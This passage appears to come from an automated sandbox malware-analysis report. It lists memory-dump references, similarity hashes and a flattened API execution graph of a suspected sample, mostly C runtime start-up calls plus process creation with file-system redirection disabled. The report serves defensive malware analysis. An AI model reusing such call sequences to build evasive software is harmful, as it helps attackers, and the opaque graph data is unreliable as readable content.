                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                      • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                      • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                      • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:25%
                                      Dynamic/Decrypted Code Coverage:8.1%
                                      Signature Coverage:6.7%
                                      Total number of Nodes:1653
                                      Total number of Limit Nodes:37
                                      execution_graph 4964 404140 RtlEncodePointer 6517 407a40 RtlUnwind 6605 401c80 6608 4045b4 6605->6608 6607 401c85 6607->6607 6609 4045e6 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 6608->6609 6610 4045d9 6608->6610 6611 4045dd 6609->6611 6610->6609 6610->6611 6611->6607 6668 402f20 6669 402f59 6668->6669 6670 402f4c 6668->6670 6672 404f4c setSBUpLow 5 API calls 6669->6672 6671 404f4c setSBUpLow 5 API calls 6670->6671 6671->6669 6673 402f69 __except_handler4 __IsNonwritableInCurrentImage 6672->6673 6674 402fec 6673->6674 6675 402fc2 __except_handler4 6673->6675 6684 403ae2 RtlUnwind 6673->6684 6675->6674 6676 402fdc 6675->6676 6677 404f4c setSBUpLow 5 API calls 6675->6677 6678 404f4c setSBUpLow 5 API calls 6676->6678 6677->6676 6678->6674 6680 40303e __except_handler4 6681 403072 6680->6681 6682 404f4c setSBUpLow 5 API calls 6680->6682 6683 404f4c setSBUpLow 5 API calls 6681->6683 6682->6681 6683->6675 6684->6680 6518 401c42 6521 403c2c 6518->6521 6522 404277 __getptd_noexit 66 API calls 6521->6522 6523 401c53 6522->6523 6685 405622 6688 405487 6685->6688 6687 405631 6689 405493 _doexit 6688->6689 6690 4042f0 __getptd 66 API calls 6689->6690 6691 40549c 6690->6691 6692 40517e __setmbcp 68 API calls 6691->6692 6693 4054a6 6692->6693 6719 405222 6693->6719 6696 40599b __malloc_crt 66 API calls 6697 4054c7 6696->6697 6709 4055e6 _doexit 6697->6709 6726 40529e 6697->6726 6700 4055f3 6704 405606 6700->6704 6706 4012b0 _free 66 API calls 6700->6706 6700->6709 6701 4054f7 InterlockedDecrement 6702 405507 6701->6702 6703 405518 InterlockedIncrement 6701->6703 6702->6703 6708 4012b0 _free 66 API calls 6702->6708 6705 40552e 6703->6705 6703->6709 6707 401e66 __set_osfhnd 66 API calls 6704->6707 6705->6709 6711 40629e __lock 66 API calls 6705->6711 6706->6704 6707->6709 6710 405517 6708->6710 6709->6687 6710->6703 6713 405542 InterlockedDecrement 6711->6713 6714 4055d1 InterlockedIncrement 6713->6714 6715 4055be 6713->6715 6736 4055e8 6714->6736 6715->6714 6717 4012b0 _free 66 API calls 6715->6717 6718 4055d0 6717->6718 6718->6714 6720 401eaf _LocaleUpdate::_LocaleUpdate 76 API calls 6719->6720 6721 405236 6720->6721 6722 405241 GetOEMCP 6721->6722 6723 40525f 6721->6723 6725 405251 6722->6725 6724 405264 GetACP 6723->6724 6723->6725 6724->6725 6725->6696 6725->6709 6727 405222 getSystemCP 78 API calls 6726->6727 6728 4052be 6727->6728 6729 4052c9 setSBCS 6728->6729 6732 40530d IsValidCodePage 6728->6732 6735 405332 _memset __setmbcp_nolock 6728->6735 6730 404f4c setSBUpLow 5 API calls 6729->6730 6731 405485 6730->6731 6731->6700 6731->6701 6732->6729 6733 40531f GetCPInfo 6732->6733 6733->6729 6733->6735 6739 404fee GetCPInfo 6735->6739 6800 4061c5 LeaveCriticalSection 6736->6800 6738 4055ef 6738->6709 6742 405022 _memset 6739->6742 6748 4050d6 6739->6748 6749 408025 6742->6749 6744 404f4c setSBUpLow 5 API calls 6746 40517c 6744->6746 6746->6735 6747 407ef8 ___crtLCMapStringA 82 API calls 6747->6748 6748->6744 6750 401eaf _LocaleUpdate::_LocaleUpdate 76 API calls 6749->6750 6751 408038 6750->6751 6759 407f3e 6751->6759 6754 407ef8 6755 401eaf _LocaleUpdate::_LocaleUpdate 76 API calls 6754->6755 6756 407f0b 6755->6756 6776 407d11 6756->6776 6760 407f67 MultiByteToWideChar 6759->6760 6761 407f5c 6759->6761 6764 407f94 6760->6764 6771 407f90 6760->6771 6761->6760 6762 407fa9 _memset __crtGetStringTypeA_stat 6766 407fe2 MultiByteToWideChar 6762->6766 6762->6771 6763 404f4c setSBUpLow 5 API calls 6765 405091 6763->6765 6764->6762 6767 4012ea _malloc 66 API calls 6764->6767 6765->6754 6768 407ff8 GetStringTypeW 6766->6768 6769 408009 6766->6769 6767->6762 6768->6769 6772 407cf1 6769->6772 6771->6763 6773 407cfd 6772->6773 6774 407d0e 6772->6774 6773->6774 6775 4012b0 _free 66 API calls 6773->6775 6774->6771 6775->6774 6777 407d2f MultiByteToWideChar 6776->6777 6779 407d8d 6777->6779 6783 407d94 6777->6783 6780 404f4c setSBUpLow 5 API calls 6779->6780 6782 4050b1 6780->6782 6781 407de1 MultiByteToWideChar 6784 407dfa LCMapStringW 6781->6784 6799 407ed9 6781->6799 6782->6747 6785 4012ea _malloc 66 API calls 6783->6785 6789 407dad __crtGetStringTypeA_stat 6783->6789 6786 407e19 6784->6786 6784->6799 6785->6789 6788 407e23 6786->6788 6793 407e4c 6786->6793 6787 407cf1 __freea 66 API calls 6787->6779 6791 407e37 LCMapStringW 6788->6791 6788->6799 6789->6779 6789->6781 6790 407e67 __crtGetStringTypeA_stat 6792 407e9b LCMapStringW 6790->6792 6790->6799 6791->6799 6794 407ed3 6792->6794 6796 407eb1 WideCharToMultiByte 6792->6796 6793->6790 6795 4012ea _malloc 66 API calls 6793->6795 6797 407cf1 __freea 66 API calls 6794->6797 6795->6790 6796->6794 6797->6799 6799->6787 6800->6738 6524 408543 6525 40223c __amsg_exit 66 API calls 6524->6525 6526 40854a 6525->6526 6801 231f46 6802 231672 10 API calls 6801->6802 6803 231f50 6802->6803 6527 404149 TlsAlloc 6612 402d09 6613 402d16 6612->6613 6614 4059e0 __calloc_crt 66 API calls 6613->6614 6615 402d30 6614->6615 6616 4059e0 __calloc_crt 66 API calls 6615->6616 6617 402d49 6615->6617 6616->6617 6618 40430a 6619 404316 _doexit 6618->6619 6620 40432e 6619->6620 6622 404418 _doexit 6619->6622 6623 4012b0 _free 66 API calls 6619->6623 6621 40433c 6620->6621 6624 4012b0 _free 66 API calls 6620->6624 6625 40434a 6621->6625 6626 4012b0 _free 66 API calls 6621->6626 6623->6620 6624->6621 6627 404358 6625->6627 6628 4012b0 _free 66 API calls 6625->6628 6626->6625 6629 404366 6627->6629 6631 4012b0 _free 66 API calls 6627->6631 6628->6627 6630 404374 6629->6630 6632 4012b0 _free 66 API calls 6629->6632 6633 404382 6630->6633 6634 4012b0 _free 66 API calls 6630->6634 6631->6629 6632->6630 6635 404393 6633->6635 6636 4012b0 _free 66 API calls 6633->6636 6634->6633 6637 40629e __lock 66 API calls 6635->6637 6636->6635 6638 40439b 6637->6638 6639 4043a7 InterlockedDecrement 6638->6639 6645 4043c0 6638->6645 6641 4043b2 6639->6641 6639->6645 6643 4012b0 _free 66 API calls 6641->6643 6641->6645 6643->6645 6644 40629e __lock 66 API calls 6646 4043d4 6644->6646 6654 404424 6645->6654 6647 404405 6646->6647 6649 4056ce ___removelocaleref 8 API calls 6646->6649 6657 404430 6647->6657 6652 4043e9 6649->6652 6651 4012b0 _free 66 API calls 6651->6622 6652->6647 6653 405767 ___freetlocinfo 66 API calls 6652->6653 6653->6647 6660 4061c5 LeaveCriticalSection 6654->6660 6656 4043cd 6656->6644 6661 4061c5 LeaveCriticalSection 6657->6661 6659 404412 6659->6651 6660->6656 6661->6659 6528 403bcc IsProcessorFeaturePresent 6529 403a50 6530 403a62 6529->6530 6532 403a70 @_EH4_CallFilterFunc@8 6529->6532 6531 404f4c setSBUpLow 5 API calls 6530->6531 6531->6532 6662 231272 6663 231279 6662->6663 6664 231285 6663->6664 6665 2308ef 14 API calls 6663->6665 6666 231666 ExitProcess 6663->6666 6665->6663 4965 401b13 5003 402ec0 4965->5003 4967 401b1f GetStartupInfoW 4968 401b33 HeapSetInformation 4967->4968 4970 401b3e 4967->4970 4968->4970 5004 401f51 HeapCreate 4970->5004 4971 401b8c 4972 401b97 4971->4972 5103 401aea 4971->5103 5005 404439 GetModuleHandleW 4972->5005 4975 401b9d 4976 401ba8 __RTC_Initialize 4975->4976 4977 401aea _fast_error_exit 66 API calls 4975->4977 5030 4030af GetStartupInfoW 4976->5030 4977->4976 4980 401bc2 GetCommandLineW 5043 40409c GetEnvironmentStringsW 4980->5043 4983 401bd2 5049 403fee GetModuleFileNameW 4983->5049 4986 401bdc 4987 401be7 4986->4987 4988 40223c __amsg_exit 66 API calls 4986->4988 5053 403dbc 4987->5053 4988->4987 4990 401bed 4991 401bf8 4990->4991 4992 40223c __amsg_exit 66 API calls 4990->4992 5067 40201b 4991->5067 4992->4991 4994 401c00 4995 401c0b __wwincmdln 4994->4995 4996 40223c __amsg_exit 66 API calls 4994->4996 5073 401000 GetTickCount Sleep GetTickCount 4995->5073 4996->4995 4999 401c3b 5121 40221e 4999->5121 5002 401c40 _doexit 5003->4967 5004->4971 5006 404456 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5005->5006 5007 40444d 5005->5007 5010 4044a0 TlsAlloc 5006->5010 5124 404186 5007->5124 5012 4044ee TlsSetValue 5010->5012 5013 4045af 5010->5013 5012->5013 5014 4044ff 5012->5014 5013->4975 5134 401fc4 5014->5134 5019 404547 DecodePointer 5022 40455c 5019->5022 5020 4045aa 5021 404186 __mtterm 70 API calls 5020->5021 5021->5013 5022->5020 5143 4059e0 5022->5143 5025 40457a DecodePointer 5026 40458b 5025->5026 5026->5020 5027 40458f 5026->5027 5149 4041c3 5027->5149 5029 404597 GetCurrentThreadId 5029->5013 5031 4059e0 __calloc_crt 66 API calls 5030->5031 5040 4030cd 5031->5040 5032 403278 GetStdHandle 5037 403242 5032->5037 5033 4059e0 __calloc_crt 66 API calls 5033->5040 5034 4032dc SetHandleCount 5042 401bb6 5034->5042 5035 4031c2 5035->5037 5038 4031f9 InitializeCriticalSectionAndSpinCount 5035->5038 5039 4031ee GetFileType 5035->5039 5036 40328a GetFileType 5036->5037 5037->5032 5037->5034 5037->5036 5041 4032b0 InitializeCriticalSectionAndSpinCount 5037->5041 5038->5035 5038->5042 5039->5035 5039->5038 5040->5033 5040->5035 5040->5037 5040->5042 5041->5037 5041->5042 5042->4980 5111 40223c 5042->5111 5044 4040b1 5043->5044 5045 4040ad 5043->5045 5046 40599b __malloc_crt 66 API calls 5044->5046 5045->4983 5048 4040d3 _memmove 5046->5048 5047 4040da FreeEnvironmentStringsW 5047->4983 5048->5047 5050 404023 _wparse_cmdline 5049->5050 5051 40599b __malloc_crt 66 API calls 5050->5051 5052 404066 _wparse_cmdline 5050->5052 5051->5052 5052->4986 5054 403dd4 _wcslen 5053->5054 5058 403dcc 5053->5058 5055 4059e0 __calloc_crt 66 API calls 5054->5055 5060 403df8 _wcslen 5055->5060 5056 403e4e 5057 4012b0 _free 66 API calls 5056->5057 5057->5058 5058->4990 5059 4059e0 __calloc_crt 66 API calls 5059->5060 5060->5056 5060->5058 5060->5059 5061 403e74 5060->5061 5062 406a7a __NMSG_WRITE 66 API calls 5060->5062 5064 403e8b 5060->5064 5063 4012b0 _free 66 API calls 5061->5063 5062->5060 5063->5058 5065 401dc2 __invoke_watson 10 API calls 5064->5065 5066 403e97 5065->5066 5066->4990 5068 402029 __IsNonwritableInCurrentImage 5067->5068 5393 405978 5068->5393 5070 402047 __initterm_e 5072 402068 __IsNonwritableInCurrentImage 5070->5072 5396 406661 5070->5396 5072->4994 5074 401097 GetCommandLineW 5073->5074 5075 40102b 5073->5075 5077 4010a5 5074->5077 5461 401a4f 5075->5461 5079 4010b0 GetCurrentProcess IsWow64Process 5077->5079 5080 4010a9 5077->5080 5082 401132 #17 LoadStringW LoadStringW 5079->5082 5083 4010c5 _memset 5079->5083 5080->4999 5118 4021f2 5080->5118 5082->5080 5085 40116b LoadAcceleratorsW 5082->5085 5083->5082 5092 4010d8 Wow64DisableWow64FsRedirection GetCommandLineW CreateProcessW 5083->5092 5084 401043 5477 401826 5084->5477 5087 4011de GetMessageW 5085->5087 5090 4011eb DestroyMenu 5087->5090 5091 40117e TranslateAcceleratorW 5087->5091 5088 401049 5089 401915 _fseek 101 API calls 5088->5089 5093 401053 VirtualAlloc 5089->5093 5090->5080 5091->5087 5094 401193 5091->5094 5095 401108 WaitForSingleObject GetExitCodeProcess ExitProcess 5092->5095 5096 401129 Wow64RevertWow64FsRedirection 5092->5096 5490 401675 5093->5490 5098 4011ca TranslateMessage DispatchMessageW 5094->5098 5100 4011a2 GetParent 5094->5100 5096->5082 5098->5087 5100->5098 5102 4011b5 PostMessageW 5100->5102 5102->5087 5104 401af8 5103->5104 5105 401afd 5103->5105 5106 40242f __FF_MSGBANNER 66 API calls 5104->5106 5107 402280 __NMSG_WRITE 66 API calls 5105->5107 5106->5105 5108 401b05 5107->5108 5109 401f9a _doexit 3 API calls 5108->5109 5110 401b0f 5109->5110 5110->4972 5112 40242f __FF_MSGBANNER 66 API calls 5111->5112 5113 402246 5112->5113 5114 402280 __NMSG_WRITE 66 API calls 5113->5114 5115 40224e 5114->5115 6322 402208 5115->6322 5119 4020b2 _doexit 66 API calls 5118->5119 5120 402203 5119->5120 5120->4999 5122 4020b2 _doexit 66 API calls 5121->5122 5123 402229 5122->5123 5123->5002 5125 404190 DecodePointer 5124->5125 5126 40419f 5124->5126 5125->5126 5127 4041b0 TlsFree 5126->5127 5128 4041be 5126->5128 5127->5128 5129 40618a DeleteCriticalSection 5128->5129 5130 4061a2 5128->5130 5162 4012b0 5129->5162 5132 4061b4 DeleteCriticalSection 5130->5132 5133 404452 5130->5133 5132->5130 5133->4975 5188 404140 RtlEncodePointer 5134->5188 5136 401fcc __init_pointers __initp_misc_winsig 5189 40630a EncodePointer 5136->5189 5138 401ff2 EncodePointer EncodePointer EncodePointer EncodePointer 5139 406124 5138->5139 5140 40612f 5139->5140 5141 406139 InitializeCriticalSectionAndSpinCount 5140->5141 5142 404543 5140->5142 5141->5140 5141->5142 5142->5019 5142->5020 5145 4059e9 5143->5145 5146 404572 5145->5146 5147 405a07 Sleep 5145->5147 5190 40854c 5145->5190 5146->5020 5146->5025 5148 405a1c 5147->5148 5148->5145 5148->5146 5201 402ec0 5149->5201 5151 4041cf GetModuleHandleW 5202 40629e 5151->5202 5153 40420d InterlockedIncrement 5209 404265 5153->5209 5156 40629e __lock 64 API calls 5157 40422e 5156->5157 5212 40563f InterlockedIncrement 5157->5212 5159 40424c 5224 40426e 5159->5224 5161 404259 _doexit 5161->5029 5163 4012e4 _free 5162->5163 5164 4012bb HeapFree 5162->5164 5163->5128 5164->5163 5165 4012d0 5164->5165 5168 401e66 5165->5168 5171 404277 GetLastError 5168->5171 5170 4012d6 GetLastError 5170->5163 5185 404152 TlsGetValue 5171->5185 5174 4042e4 SetLastError 5174->5170 5175 4059e0 __calloc_crt 62 API calls 5176 4042a2 5175->5176 5176->5174 5177 4042aa DecodePointer 5176->5177 5178 4042bf 5177->5178 5179 4042c3 5178->5179 5180 4042db 5178->5180 5181 4041c3 __getptd_noexit 62 API calls 5179->5181 5182 4012b0 _free 62 API calls 5180->5182 5183 4042cb GetCurrentThreadId 5181->5183 5184 4042e1 5182->5184 5183->5174 5184->5174 5186 404182 5185->5186 5187 404167 DecodePointer TlsSetValue 5185->5187 5186->5174 5186->5175 5187->5186 5188->5136 5189->5138 5191 408558 5190->5191 5197 408573 5190->5197 5192 408564 5191->5192 5191->5197 5194 401e66 __set_osfhnd 65 API calls 5192->5194 5193 408586 RtlAllocateHeap 5196 4085ad 5193->5196 5193->5197 5195 408569 5194->5195 5195->5145 5196->5145 5197->5193 5197->5196 5199 402477 DecodePointer 5197->5199 5200 40248c 5199->5200 5200->5197 5201->5151 5203 4062b3 5202->5203 5204 4062c6 EnterCriticalSection 5202->5204 5227 4061dc 5203->5227 5204->5153 5206 4062b9 5206->5204 5207 40223c __amsg_exit 65 API calls 5206->5207 5208 4062c5 5207->5208 5208->5204 5391 4061c5 LeaveCriticalSection 5209->5391 5211 404227 5211->5156 5213 405660 5212->5213 5214 40565d InterlockedIncrement 5212->5214 5215 40566a InterlockedIncrement 5213->5215 5216 40566d 5213->5216 5214->5213 5215->5216 5217 405677 InterlockedIncrement 5216->5217 5218 40567a 5216->5218 5217->5218 5219 405684 InterlockedIncrement 5218->5219 5220 405687 5218->5220 5219->5220 5221 4056a0 InterlockedIncrement 5220->5221 5222 4056b0 InterlockedIncrement 5220->5222 5223 4056bb InterlockedIncrement 5220->5223 5221->5220 5222->5220 5223->5159 5392 4061c5 LeaveCriticalSection 5224->5392 5226 404275 5226->5161 5228 4061e8 _doexit 5227->5228 5229 406210 5228->5229 5230 4061f8 5228->5230 5236 40621e _doexit 5229->5236 5290 40599b 5229->5290 5254 40242f 5230->5254 5236->5206 5238 406230 5241 401e66 __set_osfhnd 65 API calls 5238->5241 5239 40623f 5242 40629e __lock 65 API calls 5239->5242 5241->5236 5244 406246 5242->5244 5245 406279 5244->5245 5246 40624e InitializeCriticalSectionAndSpinCount 5244->5246 5249 4012b0 _free 65 API calls 5245->5249 5247 40626a 5246->5247 5248 40625e 5246->5248 5296 406295 5247->5296 5250 4012b0 _free 65 API calls 5248->5250 5249->5247 5251 406264 5250->5251 5253 401e66 __set_osfhnd 65 API calls 5251->5253 5253->5247 5299 406add 5254->5299 5256 402436 5258 406add __NMSG_WRITE 66 API calls 5256->5258 5262 402443 5256->5262 5257 402280 __NMSG_WRITE 66 API calls 5259 40245b 5257->5259 5258->5262 5260 402280 __NMSG_WRITE 66 API calls 5259->5260 5261 402465 5260->5261 5263 402280 5261->5263 5262->5257 5262->5261 5264 4022a1 __NMSG_WRITE 5263->5264 5266 406add __NMSG_WRITE 63 API calls 5264->5266 5286 4023bd 5264->5286 5268 4022bb 5266->5268 5267 40242d 5287 401f9a 5267->5287 5269 4023cc GetStdHandle 5268->5269 5270 406add __NMSG_WRITE 63 API calls 5268->5270 5273 4023da _strlen 5269->5273 5269->5286 5271 4022cc 5270->5271 5271->5269 5272 4022de 5271->5272 5272->5286 5324 406a7a 5272->5324 5276 402410 WriteFile 5273->5276 5273->5286 5276->5286 5277 40230a GetModuleFileNameW 5278 40232b 5277->5278 5281 402337 _wcslen 5277->5281 5279 406a7a __NMSG_WRITE 63 API calls 5278->5279 5279->5281 5280 401dc2 __invoke_watson 10 API calls 5280->5281 5281->5280 5283 406938 63 API calls __NMSG_WRITE 5281->5283 5284 4023ad 5281->5284 5333 4069ad 5281->5333 5283->5281 5342 4067cc 5284->5342 5360 404f4c 5286->5360 5370 401f6f GetModuleHandleW 5287->5370 5292 4059a4 5290->5292 5293 4059da 5292->5293 5294 4059bb Sleep 5292->5294 5373 4012ea 5292->5373 5293->5238 5293->5239 5295 4059d0 5294->5295 5295->5292 5295->5293 5390 4061c5 LeaveCriticalSection 5296->5390 5298 40629c 5298->5236 5300 406ae9 5299->5300 5301 406af3 5300->5301 5302 401e66 __set_osfhnd 66 API calls 5300->5302 5301->5256 5303 406b0c 5302->5303 5306 401e14 5303->5306 5309 401de7 DecodePointer 5306->5309 5310 401dfc 5309->5310 5315 401dc2 5310->5315 5312 401e13 5313 401de7 __wsopen_helper 10 API calls 5312->5313 5314 401e20 5313->5314 5314->5256 5318 401c99 5315->5318 5319 401cb8 _memset __call_reportfault 5318->5319 5320 401cd6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5319->5320 5322 401da4 __call_reportfault 5320->5322 5321 404f4c setSBUpLow 5 API calls 5323 401dc0 GetCurrentProcess TerminateProcess 5321->5323 5322->5321 5323->5312 5325 406a88 5324->5325 5327 406a8f 5324->5327 5325->5327 5329 406ab0 5325->5329 5326 401e66 __set_osfhnd 66 API calls 5328 406a94 5326->5328 5327->5326 5330 401e14 __wsopen_helper 11 API calls 5328->5330 5331 4022ff 5329->5331 5332 401e66 __set_osfhnd 66 API calls 5329->5332 5330->5331 5331->5277 5331->5281 5332->5328 5334 4069bf 5333->5334 5336 4069c8 5334->5336 5338 4069c3 5334->5338 5340 406a06 5334->5340 5335 401e66 __set_osfhnd 66 API calls 5337 4069df 5335->5337 5336->5281 5339 401e14 __wsopen_helper 11 API calls 5337->5339 5338->5335 5338->5336 5339->5336 5340->5336 5341 401e66 __set_osfhnd 66 API calls 5340->5341 5341->5337 5368 404140 RtlEncodePointer 5342->5368 5344 4067f2 5345 406802 LoadLibraryW 5344->5345 5346 40687f 5344->5346 5347 406917 5345->5347 5348 406817 GetProcAddress 5345->5348 5352 406899 DecodePointer DecodePointer 5346->5352 5356 4068ac 5346->5356 5353 404f4c setSBUpLow 5 API calls 5347->5353 5348->5347 5351 40682d 7 API calls 5348->5351 5349 4068e2 DecodePointer 5350 40690b DecodePointer 5349->5350 5354 4068e9 5349->5354 5350->5347 5351->5346 5355 40686f GetProcAddress EncodePointer 5351->5355 5352->5356 5357 406936 5353->5357 5354->5350 5358 4068fc DecodePointer 5354->5358 5355->5346 5356->5349 5356->5350 5359 4068cf 5356->5359 5357->5286 5358->5350 5358->5359 5359->5350 5361 404f54 5360->5361 5362 404f56 IsDebuggerPresent 5360->5362 5361->5267 5369 404f44 5362->5369 5365 407cb8 SetUnhandledExceptionFilter UnhandledExceptionFilter 5366 407cd5 __call_reportfault 5365->5366 5367 407cdd GetCurrentProcess TerminateProcess 5365->5367 5366->5367 5367->5267 5368->5344 5369->5365 5371 401f83 GetProcAddress 5370->5371 5372 401f93 ExitProcess 5370->5372 5371->5372 5374 401367 5373->5374 5380 4012f8 5373->5380 5375 402477 _malloc DecodePointer 5374->5375 5377 40136d 5375->5377 5376 401303 5379 40242f __FF_MSGBANNER 65 API calls 5376->5379 5376->5380 5383 402280 __NMSG_WRITE 65 API calls 5376->5383 5387 401f9a _doexit 3 API calls 5376->5387 5378 401e66 __set_osfhnd 65 API calls 5377->5378 5382 40135f 5378->5382 5379->5376 5380->5376 5381 401326 RtlAllocateHeap 5380->5381 5384 401353 5380->5384 5385 402477 _malloc DecodePointer 5380->5385 5388 401351 5380->5388 5381->5380 5381->5382 5382->5292 5383->5376 5386 401e66 __set_osfhnd 65 API calls 5384->5386 5385->5380 5386->5388 5387->5376 5389 401e66 __set_osfhnd 65 API calls 5388->5389 5389->5382 5390->5298 5391->5211 5392->5226 5394 40597e EncodePointer 5393->5394 5394->5394 5395 405998 5394->5395 5395->5070 5399 406625 5396->5399 5398 40666e 5398->5072 5400 406631 _doexit 5399->5400 5407 401fb2 5400->5407 5406 406652 _doexit 5406->5398 5408 40629e __lock 66 API calls 5407->5408 5409 401fb9 5408->5409 5410 40653e DecodePointer DecodePointer 5409->5410 5411 40656c 5410->5411 5412 4065ed 5410->5412 5411->5412 5424 408704 5411->5424 5421 40665b 5412->5421 5414 4065d0 EncodePointer EncodePointer 5414->5412 5415 4065a2 5415->5412 5418 405a2c __realloc_crt 70 API calls 5415->5418 5419 4065be EncodePointer 5415->5419 5416 40657e 5416->5414 5416->5415 5431 405a2c 5416->5431 5420 4065b8 5418->5420 5419->5414 5420->5412 5420->5419 5457 401fbb 5421->5457 5425 408724 HeapSize 5424->5425 5426 40870f 5424->5426 5425->5416 5427 401e66 __set_osfhnd 66 API calls 5426->5427 5428 408714 5427->5428 5429 401e14 __wsopen_helper 11 API calls 5428->5429 5430 40871f 5429->5430 5430->5416 5435 405a35 5431->5435 5433 405a74 5433->5415 5434 405a55 Sleep 5434->5435 5435->5433 5435->5434 5436 40137e 5435->5436 5437 401394 5436->5437 5438 401389 5436->5438 5440 40139c 5437->5440 5449 4013a9 5437->5449 5439 4012ea _malloc 66 API calls 5438->5439 5441 401391 5439->5441 5442 4012b0 _free 66 API calls 5440->5442 5441->5435 5456 4013a4 _free 5442->5456 5443 4013e1 5444 402477 _malloc DecodePointer 5443->5444 5446 4013e7 5444->5446 5445 4013b1 HeapReAlloc 5445->5449 5445->5456 5447 401e66 __set_osfhnd 66 API calls 5446->5447 5447->5456 5448 401411 5451 401e66 __set_osfhnd 66 API calls 5448->5451 5449->5443 5449->5445 5449->5448 5450 402477 _malloc DecodePointer 5449->5450 5453 4013f9 5449->5453 5450->5449 5452 401416 GetLastError 5451->5452 5452->5456 5454 401e66 __set_osfhnd 66 API calls 5453->5454 5455 4013fe GetLastError 5454->5455 5455->5456 5456->5435 5460 4061c5 LeaveCriticalSection 5457->5460 5459 401fc2 5459->5406 5460->5459 5493 401991 5461->5493 5463 401038 5464 401915 5463->5464 5468 401921 _doexit 5464->5468 5465 40192d 5466 401e66 __set_osfhnd 66 API calls 5465->5466 5469 401932 5466->5469 5467 401953 6143 402dda 5467->6143 5468->5465 5468->5467 5472 401e14 __wsopen_helper 11 API calls 5469->5472 5474 40193d _doexit 5472->5474 5474->5084 5478 401832 _doexit 5477->5478 5479 401853 5478->5479 5480 40183e 5478->5480 5482 402dda __lock_file 67 API calls 5479->5482 5481 401e66 __set_osfhnd 66 API calls 5480->5481 5483 401843 5481->5483 5484 40185b 5482->5484 5485 401e14 __wsopen_helper 11 API calls 5483->5485 5486 401692 __ftell_nolock 71 API calls 5484->5486 5489 40184e _doexit 5485->5489 5487 401868 5486->5487 6223 401881 5487->6223 5489->5088 6226 4015e7 5490->6226 5492 401072 GetCommandLineW 5492->5074 5494 40199d _doexit 5493->5494 5495 4019b0 5494->5495 5497 4019de 5494->5497 5496 401e66 __set_osfhnd 66 API calls 5495->5496 5498 4019b5 5496->5498 5512 403889 5497->5512 5500 401e14 __wsopen_helper 11 API calls 5498->5500 5507 4019c0 _doexit @_EH4_CallFilterFunc@8 5500->5507 5501 4019e3 5502 4019f7 5501->5502 5503 4019ea 5501->5503 5505 401a1f 5502->5505 5506 4019ff 5502->5506 5504 401e66 __set_osfhnd 66 API calls 5503->5504 5504->5507 5529 4035d0 5505->5529 5508 401e66 __set_osfhnd 66 API calls 5506->5508 5507->5463 5508->5507 5513 403895 _doexit 5512->5513 5514 40629e __lock 66 API calls 5513->5514 5515 4038a3 5514->5515 5516 40391f 5515->5516 5524 4061dc __mtinitlocknum 66 API calls 5515->5524 5527 403918 5515->5527 5555 402e1b 5515->5555 5560 402e89 5515->5560 5517 40599b __malloc_crt 66 API calls 5516->5517 5519 403926 5517->5519 5520 403934 InitializeCriticalSectionAndSpinCount 5519->5520 5519->5527 5522 403954 5520->5522 5523 403967 EnterCriticalSection 5520->5523 5521 4039a8 _doexit 5521->5501 5526 4012b0 _free 66 API calls 5522->5526 5523->5527 5524->5515 5526->5527 5552 4039b3 5527->5552 5531 4035f2 5529->5531 5530 403624 __wopenfile 5535 403832 5530->5535 5548 4037d9 5530->5548 5570 40795e 5530->5570 5531->5530 5532 40360d 5531->5532 5533 401e66 __set_osfhnd 66 API calls 5532->5533 5534 403612 5533->5534 5537 401e14 __wsopen_helper 11 API calls 5534->5537 5538 401e66 __set_osfhnd 66 API calls 5535->5538 5536 403844 5567 407859 5536->5567 5541 401a2a 5537->5541 5540 403837 5538->5540 5542 401e14 __wsopen_helper 11 API calls 5540->5542 5549 401a45 5541->5549 5542->5541 5545 40795e __wcsnicmp 78 API calls 5546 4037f1 5545->5546 5547 40795e __wcsnicmp 78 API calls 5546->5547 5546->5548 5547->5548 5548->5535 5548->5536 6136 402e4d 5549->6136 5551 401a4d 5551->5507 5565 4061c5 LeaveCriticalSection 5552->5565 5554 4039ba 5554->5521 5556 402e28 5555->5556 5557 402e3e EnterCriticalSection 5555->5557 5558 40629e __lock 66 API calls 5556->5558 5557->5515 5559 402e31 5558->5559 5559->5515 5561 402e99 5560->5561 5562 402eac LeaveCriticalSection 5560->5562 5566 4061c5 LeaveCriticalSection 5561->5566 5562->5515 5564 402ea9 5564->5515 5565->5554 5566->5564 5578 407795 5567->5578 5569 407874 5569->5541 5571 4079e6 5570->5571 5572 40796d 5570->5572 6026 407879 5571->6026 5574 401e66 __set_osfhnd 66 API calls 5572->5574 5577 4037d2 5572->5577 5575 407984 5574->5575 5576 401e14 __wsopen_helper 11 API calls 5575->5576 5576->5577 5577->5545 5577->5548 5580 4077a1 _doexit 5578->5580 5579 4077b4 5581 401e66 __set_osfhnd 66 API calls 5579->5581 5580->5579 5583 4077ea 5580->5583 5582 4077b9 5581->5582 5584 401e14 __wsopen_helper 11 API calls 5582->5584 5589 407060 5583->5589 5588 4077c3 _doexit 5584->5588 5586 407804 5696 40782b 5586->5696 5588->5569 5590 407087 5589->5590 5700 408be9 5590->5700 5592 401dc2 __invoke_watson 10 API calls 5602 407794 _doexit 5592->5602 5593 4070a3 5594 4070e2 5593->5594 5604 40713d 5593->5604 5642 407312 5593->5642 5725 